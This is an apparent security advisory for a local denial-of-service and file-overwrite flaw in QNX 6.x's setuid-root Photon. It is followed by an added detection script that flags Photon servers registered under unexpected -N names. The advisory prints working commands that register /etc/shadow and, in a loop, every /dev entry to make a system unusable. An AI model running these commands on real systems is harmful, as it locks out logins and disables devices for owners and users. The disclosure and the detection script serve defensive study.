QNX 6.x Photon Denial Of Service / File Overwrite

2014.03.10
Credit: cenobyte
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#
# QNX 6.x Photon denial of service vulnerability by cenobyte 2013
# <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# QNX setuid root /usr/photon/bin/Photon allows users to create new servers with
# arbitrary filenames registered with the -N parameter.
# Photon does not check whether files exist and/or the owner of the file is the
# same as the user. Thus any user can create a new server with a filename such
# as /etc/shadow resulting in a denial of service attack.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.1
# QNX 6.3.0
# QNX 6.2.0

$ id
uid=100(user) gid=100
$ /usr/photon/bin/Photon -N /etc/shadow
$ su -
su error: Password and Shadow files on different devices
$ ps -edaf | grep Photon
100 4524851 4520182 - Oct26 ? 00:00:00 /usr/photon/bin/Photon -N /etc/shadow
$ kill -9 4524851
$ su -
password:
Sat Oct 26 13:22:38 2013 on /dev/ttyp1
Last login: Sat Oct 26 02:43:08 2013 on /dev/ttyp1
edit the file .profile if you want to change your environment.
To start the Photon windowing environment, type "ph".
#

If you want to make the system unusable:

$ for x in $(ls /dev); do /usr/photon/bin/Photon -N "/dev/$x"; done
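A detection check for the condition shown in the `ps -edaf` output above, added here as an example and not part of the original advisory: it flags any Photon server whose `-N` name is not on an allow-list. The function names are hypothetical, the `ALLOWED_NAMES` default of `/dev/photon` is an assumption to adjust per system, and all sample lines except the `/etc/shadow` one from the advisory are constructed.

```shell
#!/bin/sh
# Added example: flag Photon servers registered under unexpected names.
# ALLOWED_NAMES is a site assumption (space-separated list of expected names).
ALLOWED_NAMES="${ALLOWED_NAMES:-/dev/photon}"

# Reads `ps -edaf`-style lines on stdin (uid in column 1, pid in column 2)
# and prints "uid pid name" for every Photon server with a non-allowed name.
photon_name_findings() {
    awk -v allowed="$ALLOWED_NAMES" '
    BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    {
        # Find the Photon binary in the command part of the line.
        cmd = 0
        for (i = 1; i <= NF; i++)
            if ($i == "Photon" || $i ~ /\/Photon$/) { cmd = i; break }
        if (!cmd) next
        # Accept both "-N name" and the joined "-Nname" spelling.
        for (i = cmd + 1; i <= NF; i++) {
            name = ""
            if ($i == "-N" && i < NF) name = $(i + 1)
            else if ($i ~ /^-N./) name = substr($i, 3)
            if (name != "" && !(name in ok)) { print $1, $2, name; break }
        }
    }'
}

# Sample input: line 3 is the process line from the advisory,
# the other lines are constructed for this example.
sample_ps() {
    cat <<'EOF'
0 4100 1 - Oct26 ? 00:00:02 /usr/photon/bin/Photon
0 4101 1 - Oct26 ? 00:00:02 /usr/photon/bin/Photon -N /dev/photon
100 4524851 4520182 - Oct26 ? 00:00:00 /usr/photon/bin/Photon -N /etc/shadow
100 4524900 4520182 - Oct26 ? 00:00:00 grep Photon
EOF
}

# On a live system: ps -edaf | photon_name_findings
sample_ps | photon_name_findings
```
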

